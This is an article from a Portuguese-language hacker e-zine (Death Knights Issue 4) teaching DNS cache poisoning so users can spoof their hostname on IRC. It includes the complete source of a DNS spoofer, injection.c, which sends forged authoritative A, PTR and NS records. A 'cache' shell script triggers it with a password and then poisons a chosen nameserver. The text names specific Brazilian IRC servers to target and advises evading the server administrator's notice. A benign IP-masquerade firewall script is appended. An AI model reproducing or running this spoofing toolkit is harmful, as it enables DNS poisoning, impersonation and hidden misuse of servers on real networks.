Injection Spoof
Death Knights Issue 4
by James007
Bem, eh a primeira vez que escrevo para a TDK, e resolvi escrever sobre esse assunto, vamos dizer... interessante......
Vou comecar explicando como spoofar usando 2 maquinas (mais seguro, pois voce nao vai precisar deixar o named killado na maqina principal ;)
Primeiro, voce deve considerar que voce precisa de 2 maquinas em uma rede, as duas sendo Linux (nao pode ser outro UNIX), sendo que uma precisa ser NS primario com autoritative answer...
Comecando....
Vamos dizer que vc tenha root na maquina netgo3.netgo.com.br, que eh NS primario com nameserver authotidative.. e que voce tenha root na james007.netgo.com.br que *nao* eh nameserver.... vc vai na netgo3.netgo.com.br e indica a james007.netgo.com.br no named sendo nameserver... exemplo:
netgo3 IN NS james007.netgo.com.br
ai vc killa o named dessa maquina ( netgo3.netgo.com.br ) e executa denovo. Agora voce loga como root na james007.netgo.com.br e killa o named dela se tiver rodando named.. ai.. vc vai mandar o injection.c ( q jah vem nessa edicao da TDK ) para a james007.netgo.com.br e compile....
Depois de compilado, execute o injection com a seguinte sintaxe:
./injection senha > /dev/null 2> /dev/null &
Agora, voce vai pegar um shell script, q jah vem nessa edicao, chamado cache, e vai editar ele...
Edite as seguintes linhas:
PASSWORD=senha
INJ_SERVER=maquina.que.roda.o.injection
SPOOF_SERVER=maquina.que.da.ns.ao.injection
No "PASSWORD=" coloque a senha que vc escolheu ..
no "INJ_SERVER=" coloca a host da maquina q roda o injection e no "SPOOF_SERVER=" voce coloca a host da maquina q da NS ao injection
agora tah prontinho ..
O cache fica na sua maquina ai vc executa ele assim:
cache seu-ip seu-ip-spoofado irc.servidor-onde-vc-quer-spoofar.com.br
e prontow ..
;)
Agora vou explicar usando soh uma maquina, que no caso precisa ser NS primario com authoridative answer ..
Voce loga como root nessa maquina.... kille o named.. e execute o injection com os mesmos parametros...
ai na hora de configurar o cache, vc coloca no INJ_SERVER e no SPOOF_SERVER a mesma host.. e tah valendo..... ;)
Ai eh soh executa o cache na sua maquina da mesma forma.. simples naum?! ;)
soh tem um problema.. nao eh bom ficar killando o named, rodando o injection, depois killar o injection, e rodar o named.... o root pode perseber.. alem do mais.. pode dar pau nas hosts da provedora.. por isso.... tome cuidado com o q faz.... ;)
Eh isso ai... tah ai... pra mim eh a forma mais facil de spoofar...
eu particularmente nao gosto de programas to tipo jizz, e da familia.. ;)
Eh isso ai d00z! tah ai.. agora eh soh vc arranjar uma NS primario q tenha authoridative answer e enjoy..
ah.. jah ia me eskecendo da lista de servers q da pra spoofar...
Vou colocar soh servers da brasirc.. nao vou falar nenhum da brasnet nem rede brasil:
irc.eribeiro.com.br
irc.sercomtel.com.br
irc.summer.com.br
Eh.. tah bom. chega.. ;)
OBS: O injection.c e o script cache vem anexos a este zine.
James007 James@DeathKnights.com
`'`'`'`' `'`'`'`'`'`'`'`'`'`'`'
injection.c
/*
injection.c DNS spoofer by savage@apostols.org 30/May/1997
based on jizz.c by teak@ib6ub9.com
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <strings.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <signal.h>
#define MAXBUFSIZE 64*1024
#define DEFAULT_TTL 60*5
#define DC_A 1
#define DC_NS 2
#define DC_CNAME 5
#define DC_SOA 6
#define DC_WKS 11
#define DC_PTR 12
#define DC_HINFO 13
#define DC_MINFO 14
#define DC_MX 15
#define DC_TXT 16
typedef struct
{
unsigned short id;
unsigned char rd:1; /* recursion desired */
unsigned char tc:1; /* truncated message */
unsigned char aa:1; /* authoritive answer */
unsigned char opcode:4; /* purpose of message */
unsigned char qr:1; /* response flag */
unsigned char rcode:4; /* response code */
unsigned char unused:2; /* unused bits */
unsigned char pr:1; /* primary server required (non standard) */
unsigned char ra:1; /* recursion available */
unsigned short qdcount;
unsigned short ancount;
unsigned short nscount;
unsigned short arcount;
}
dnsheaderrec;
typedef struct
{
unsigned short labellen;
char label[256];
unsigned short type;
unsigned short class;
unsigned long ttl;
unsigned short buflen;
char buf[256];
}
dnsrrrec;
typedef struct
{
dnsheaderrec h;
dnsrrrec qd[20];
dnsrrrec an[20];
dnsrrrec ns[20];
dnsrrrec ar[20];
}
dnsrec;
char *dnssprintflabel (char *s, char *buf, char *p);
char *dnsaddlabel (char *p, char *label);
void dnstxt2rr (dnsrrrec * rr, char *b);
void dnsbuildpacket (dnsrec * dns, short qdcount, short ancount, short nscount, short arcount,...);
char *dnsaddbuf (char *p, void *buf, short len);
int dnsmakerawpacket (dnsrec * dns, char *buf);
unsigned long default_ttl;
unsigned long
rev_long (l)
unsigned long l;
{
unsigned long i = 0;
int n = sizeof (i);
while (n--)
{
i = (i << 8) | (l & 255);
l >>= 8;
}
return i;
}
char *
dnssprintflabel (char *s, char *buf, char *p)
{
unsigned short i, len;
char *b = NULL;
len = (unsigned short) *(p++);
while (len)
{
while (len >= 0xC0)
{
if (!b)
b = p + 1;
p = buf + (ntohs (*((unsigned short *) (p - 1))) & ~0xC000);
len = (unsigned short) *(p++);
}
for (i = 0; i < len; i++)
*(s++) = *(p++);
*(s++) = '.';
len = (unsigned short) *(p++);
}
*(s++) = 0;
if (b)
return (b);
return (p);
}
char *
dnsaddlabel (char *p, char *label)
{
char *p1;
while ((*label) && (label))
{
if ((*label == '.') && (!*(label + 1)))
break;
p1 = strchr (label, '.');
if (!p1)
p1 = strchr (label, 0);
*(p++) = p1 - label;
memcpy (p, label, p1 - label);
p += p1 - label;
label = p1;
if (*p1)
label++;
}
*(p++) = 0;
return (p);
}
void
dnstxt2rr (dnsrrrec * rr, char *b)
{
char *tok[20], *p;
unsigned short numt = 0, i;
static char *buf = NULL;
if (!buf)
{
if ((buf = malloc (1024)) == NULL)
{
perror ("malloc");
exit (-1);
}
}
strcpy (buf, b);
p = strtok (buf, " \t");
do
{
tok[numt++] = p;
}
while (p = strtok (NULL, " \t"));
p = dnsaddlabel (rr->label, tok[0]);
rr->labellen = p - rr->label;
i = 1;
if (isdigit (*tok[i]))
rr->ttl = htonl (atol (tok[i++]));
else
rr->ttl = htonl (default_ttl);
if (strcmp (tok[i], "IN") == 0)
i++;
rr->class = htons (1);
if (strcmp (tok[i], "A") == 0)
{
i++;
rr->type = htons (DC_A);
if (i < numt)
{
inet_aton (tok[i], rr->buf);
rr->buflen = 4;
}
else
rr->buflen = 0;
return;
}
if (strcmp (tok[i], "CNAME") == 0)
{
i++;
rr->type = htons (DC_CNAME);
if (i < numt)
{
p = dnsaddlabel (rr->buf, tok[i]);
rr->buflen = p - rr->buf;
}
else
rr->buflen = 0;
return;
}
if (strcmp (tok[i], "NS") == 0)
{
i++;
rr->type = htons (DC_NS);
if (i < numt)
{
p = dnsaddlabel (rr->buf, tok[i]);
rr->buflen = p - rr->buf;
}
else
rr->buflen = 0;
return;
}
if (strcmp (tok[i], "PTR") == 0)
{
i++;
rr->type = htons (DC_PTR);
if (i < numt)
{
p = dnsaddlabel (rr->buf, tok[i]);
rr->buflen = p - rr->buf;
}
else
rr->buflen = 0;
return;
}
if (strcmp (tok[i], "MX") == 0)
{
i++;
rr->type = htons (DC_MX);
if (i < numt)
{
p = rr->buf;
*((unsigned short *) p) = htons (atoi (tok[i++]));
p += 2;
p = dnsaddlabel (p, tok[i]);
rr->buflen = p - rr->buf;
}
else
rr->buflen = 0;
return;
}
}
void
dnsbuildpacket (dnsrec * dns, short qdcount, short ancount, short nscount, short arcount,...)
{
int i;
va_list va;
dns->h.qdcount = htons (qdcount);
dns->h.ancount = htons (ancount);
dns->h.nscount = htons (nscount);
dns->h.arcount = htons (arcount);
dns->h.rcode = 0;
va_start (va, arcount);
for (i = 0; i < qdcount; i++)
dnstxt2rr (&dns->qd[i], va_arg (va, char *));
for (i = 0; i < ancount; i++)
dnstxt2rr (&dns->an[i], va_arg (va, char *));
for (i = 0; i < nscount; i++)
dnstxt2rr (&dns->ns[i], va_arg (va, char *));
for (i = 0; i < arcount; i++)
dnstxt2rr (&dns->ar[i], va_arg (va, char *));
va_end (va);
}
char *
dnsaddbuf (char *p, void *buf, short len)
{
memcpy (p, buf, len);
return (p + len);
}
int
dnsmakerawpacket (dnsrec * dns, char *buf)
{
char *p;
int i;
unsigned short len;
memcpy (buf, &dns->h, sizeof (dnsheaderrec));
p = buf + sizeof (dnsheaderrec);
/********** Query ***********/
for (i = 0; i < ntohs (dns->h.qdcount); i++)
{
p = dnsaddbuf (p, dns->qd[i].label, dns->qd[i].labellen);
p = dnsaddbuf (p, &dns->qd[i].type, 2);
p = dnsaddbuf (p, &dns->qd[i].class, 2);
}
/********** Answer ***********/
for (i = 0; i < ntohs (dns->h.ancount); i++)
{
p = dnsaddbuf (p, dns->an[i].label, dns->an[i].labellen);
p = dnsaddbuf (p, &dns->an[i].type, 2);
p = dnsaddbuf (p, &dns->an[i].class, 2);
p = dnsaddbuf (p, &dns->an[i].ttl, 4);
len = htons (dns->an[i].buflen);
p = dnsaddbuf (p, &len, 2);
p = dnsaddbuf (p, dns->an[i].buf, dns->an[i].buflen);
}
/********** Nameservers ************/
for (i = 0; i < ntohs (dns->h.nscount); i++)
{
p = dnsaddbuf (p, dns->ns[i].label, dns->ns[i].labellen);
p = dnsaddbuf (p, &dns->ns[i].type, 2);
p = dnsaddbuf (p, &dns->ns[i].class, 2);
p = dnsaddbuf (p, &dns->ns[i].ttl, 4);
len = htons (dns->ns[i].buflen);
p = dnsaddbuf (p, &len, 2);
p = dnsaddbuf (p, dns->ns[i].buf, dns->ns[i].buflen);
}
/********** Additional ************/
for (i = 0; i < ntohs (dns->h.arcount); i++)
{
p = dnsaddbuf (p, dns->ar[i].label, dns->ar[i].labellen);
p = dnsaddbuf (p, &dns->ar[i].type, 2);
p = dnsaddbuf (p, &dns->ar[i].class, 2);
p = dnsaddbuf (p, &dns->ar[i].ttl, 4);
len = htons (dns->ar[i].buflen);
p = dnsaddbuf (p, &len, 2);
p = dnsaddbuf (p, dns->ar[i].buf, dns->ar[i].buflen);
}
return (p - buf);
}
#define BFSIZE 1024
void
main (int argc, char *argv[])
{
int sock, fromlen, numread, len, query;
struct sockaddr_in sa, from, to;
struct in_addr rev;
char *buf, *sendbuf;
char *domainnamebuf;
dnsheaderrec *dns;
char *p;
dnsrec dnsh;
char *beginhost_QD, *beginhost_A, *beginhost_srch;
char *fakenshost_A, *fakens_DOM;
char *spoofedip_A, *spoofedip_PTR, *spoofedip_rev;
char *pid_named;
char FAKEIP[BFSIZE] = "194.179.44.64", FAKENAME[BFSIZE] = "The.Lammerz.Houze";
char mybuff[BFSIZE], *bp = NULL;
if (argc < 2)
{
printf ("usage: \n%s <password>\n");
exit (-1);
}
if ((beginhost_QD = malloc (BFSIZE)) == NULL)
{
perror ("malloc");
exit (-1);
}
if ((beginhost_A = malloc (BFSIZE)) == NULL)
{
perror ("malloc");
exit (-1);
}
if ((beginhost_srch = malloc (BFSIZE)) == NULL)
{
perror ("malloc");
exit (-1);
}
if ((fakenshost_A = malloc (BFSIZE)) == NULL)
{
perror ("malloc");
exit (-1);
}
if ((fakens_DOM = malloc (BFSIZE)) == NULL)
{
perror ("malloc");
exit (-1);
}
if ((spoofedip_A = malloc (BFSIZE)) == NULL)
{
perror ("malloc");
exit (-1);
}
if ((spoofedip_PTR = malloc (BFSIZE)) == NULL)
{
perror ("malloc");
exit (-1);
}
if ((spoofedip_rev = malloc (BFSIZE)) == NULL)
{
perror ("malloc");
exit (-1);
}
if ((buf = malloc (MAXBUFSIZE)) == NULL)
{
perror ("malloc");
exit (-1);
}
if ((sendbuf = malloc (MAXBUFSIZE)) == NULL)
{
perror ("malloc");
exit (-1);
}
if ((domainnamebuf = malloc (MAXBUFSIZE)) == NULL)
{
perror ("malloc");
exit (-1);
}
if ((sock = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0)
{
perror ("socket");
exit (-1);
}
sa.sin_family = AF_INET;
/* sa.sin_addr.s_addr = inet_addr(DEFAULTBINDHOST); */
sa.sin_addr.s_addr = INADDR_ANY;
sa.sin_port = htons (53);
if (bind (sock, (struct sockaddr *) &sa, sizeof (sa)) < 0)
{
perror ("bind");
exit (-1);
}
setvbuf (stdout, NULL, _IONBF, 0);
while (1)
{
fromlen = sizeof (from);
if ((numread = recvfrom (sock, buf, MAXBUFSIZE, 0, (struct sockaddr *) &from, &fromlen)) < 0)
{
perror ("recvfrom");
continue;
}
/* Kludge to stop that damn router */
if (from.sin_addr.s_addr == inet_addr ("194.179.44.2"))
continue;
dns = (dnsheaderrec *) buf;
if (dns->qr)
continue;
p = dnssprintflabel (domainnamebuf, buf, &buf[sizeof (dnsheaderrec)]);
query = ntohs (*(unsigned short *) p);
strcpy (mybuff, domainnamebuf);
bp = strtok (mybuff, "@");
if (bp && *domainnamebuf == '@' && !strcmp (argv[1], bp))
{
bp = strtok (NULL, "@");
if (bp)
strncpy (FAKEIP, bp, BFSIZE - 1);
bp = strtok (NULL, "@");
if (bp)
strncpy (FAKENAME, bp, BFSIZE - 1);
printf ("FakeIP: %s FakeNAME: %s\n", FAKEIP, FAKENAME);
}
strcpy (beginhost_srch, ".");
snprintf (fakenshost_A, BFSIZE - 1, "ns.%s IN A 6.6.6.6", FAKENAME);
snprintf (fakens_DOM, BFSIZE - 1, "%s IN NS ns.%s", FAKENAME, FAKENAME);
snprintf (spoofedip_A, BFSIZE - 1, "%s IN A %s", FAKENAME, FAKEIP);
rev.s_addr = rev_long (inet_addr (FAKEIP));
snprintf (spoofedip_PTR, BFSIZE - 1, "%s.IN-ADDR.ARPA IN PTR %s", (char *) inet_ntoa (rev.s_addr), FAKENAME);
default_ttl = DEFAULT_TTL;
printf ("from %s : %d : '%s' (%d)\n", inet_ntoa (from.sin_addr), ntohs (from.sin_port), domainnamebuf, query);
snprintf (beginhost_QD, BFSIZE - 1, "%s IN", domainnamebuf);
snprintf (beginhost_A, BFSIZE - 1, "%s 1 IN CNAME %s", domainnamebuf, FAKENAME);
dnsbuildpacket (&dnsh, 1, 4, 1, 0,
beginhost_QD,
beginhost_A,
spoofedip_A,
spoofedip_PTR,
fakenshost_A,
fakens_DOM);
dnsh.qd[0].type = htons (query);
dnsh.h.id = ((dnsheaderrec *) buf)->id;
dnsh.h.qr = 1;
dnsh.h.aa = 1;
len = dnsmakerawpacket (&dnsh, sendbuf);
to.sin_family = AF_INET;
to.sin_addr.s_addr = from.sin_addr.s_addr;
to.sin_port = from.sin_port;
if (sendto (sock, sendbuf, len, 0, (struct sockaddr *) &to, sizeof (to)) < 0)
{
perror ("sendto");
continue;
}
}
}
cache
#!/bin/sh
#
# script to Spoof hostname based on |savage|'s injection and dns
# colors
F_RESET="[0m"
F_BLACK="[0;30m"
F_GREEN="[0;32m"
F_BLUE="[0;34m"
F_MAGENTA="[0;35m"
F_WHITE="[0;37m"
H_BLACK="[1;30m"
H_GREEN="[1;32m"
H_BLUE="[1;34m"
H_MAGENTA="[1;35m"
H_WHITE="[1;37m"
PASSWORD=senha
INJ_SERVER=maquina.que.roda.o.injection
SPOOF_SERVER=maquina.que.da.ns.ao.injection
spaces=" "
draw=$H_BLACK"o"$F_WHITE"O"$H_WHITE"o"$F_RESET
draw2=$H_WHITE"o"$F_WHITE"O"$H_BLACK"o"$F_RESET
if [ $# -ne '3' ]; then
echo "usage: cache <ip> <host> <ns to cache on>"
exit
fi
# setting
info=`echo "oO Setting [$2 IN A $1] Oo"`
n_spaces=`expr length "$info"`
n_spaces=`expr 40 - \( $n_spaces / 2 \)`
info=$draw' setting '$H_BLACK'['$H_MAGENTA$2' '$F_MAGENTA'A '$H_MAGENTA$1$H_BLACK'] '$draw2
echo "`expr substr \"$spaces\" 1 $n_spaces`$info"
nslookup @$PASSWORD@$1@$2. $INJ_SERVER > /dev/null 2> /dev/null
# injection
info=`echo "oOo Injection [$SPOOF_SERVER > $3] oOo"`
n_spaces=`expr length "$info"`
n_spaces=`expr 40 - \( $n_spaces / 2 \)`
info=$draw' injecting '$H_BLACK'['$H_GREEN$SPOOF_SERVER' '$F_GREEN'on '$H_GREEN$3$H_BLACK'] '$draw2
echo "`expr substr \"$spaces\" 1 $n_spaces`$info"
nslookup $RANDOM.$SPOOF_SERVER $3 > /dev/null 2> /dev/null
# testing
server=`nslookup $1 $3 2>/dev/null | grep Name | cut -d ":" -f2`
server=`echo $server`
info=`echo "oOo Testing $1 is $server oOo"`
n_spaces=`expr length "$info"`
n_spaces=`expr 40 - \( $n_spaces / 2 \)`
info=$draw' testing '$H_BLACK'['$H_BLUE$1' '$F_BLUE'is '$H_BLUE$server$H_BLACK'] '$draw2
echo "`expr substr \"$spaces\" 1 $n_spaces`$info"
script
echo "Running Masquerade"
# The Death Knights
# http://www.deathknights.com
#
# Script originalmente escrito por BOZOH, com algumas modificacoes feitas por
# red_evil(red_evil@uground.org).
/sbin/ipfwadm -F -p deny # idem o anterior, mas -p accept ( -p == policy ) permite o
# repasse
/sbin/ipfwadm -F -a m -S 192.168.1.0/24 -D 0.0.0.0/0 # forwarding, adiciona o
# masquerade (-a), somente
# para estes ip's (-S ),
# (-D ) destino (0.0.0.0
# significa todos ip's )
/sbin/ipfwadm -F -a m -S 192.168.1.1/32 -D 0.0.0.0/0
/sbin/ipfwadm -F -a m -S 192.168.1.2/32 -D 0.0.0.0/0
/sbin/ipfwadm -F -a m -S 192.168.1.3/32 -D 0.0.0.0/0
# .
# .
# .
# .
/sbin/ipfwadm -F -a m -S 192.168.1.254/32 -D 0.0.0.0/0
#so' estes hosts poderam usar
#o masquarede
# parametro -S :
# ip's da sua rede. por exemplo, se a sua rede tem ips 10.100.100.*, use
# 10.100.100.0 ,no lugar de 192.168.1.0.
echo "Modules ...."
# so' deixe os modulos q vc usar
/sbin/depmod -a
# obviamente, o proprio nome destes modulos se explica !!
/sbin/modprobe ip_masq_ftp
/sbin/modprobe ip_masq_irc
/sbin/modprobe ip_masq_raudio
/sbin/modprobe ip_masq_quake
/sbin/modprobe ip_masq_cuseeme
/sbin/modprobe ip_masq_vdolive
#
#
# --------------------------------------------